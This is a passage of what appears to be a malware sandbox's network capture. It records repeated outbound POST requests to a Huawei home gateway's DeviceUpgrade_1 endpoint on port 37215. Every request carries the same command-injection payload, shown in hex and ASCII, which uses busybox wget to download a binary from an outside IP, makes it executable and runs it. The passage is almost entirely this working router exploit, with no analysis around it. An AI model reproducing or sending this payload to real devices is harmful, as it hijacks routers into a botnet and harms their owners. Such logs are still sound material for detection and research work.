                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:42.376601934 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:17.191235065 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      118192.168.2.1453046102.142.57.19137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.737715006 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.658049107 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.745954037 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.889983892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:15.241710901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:23.945408106 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:42.376606941 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:17.191231012 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      119192.168.2.1448520102.28.176.5737215
                                                                      TimestampBytes transferredDirectionData
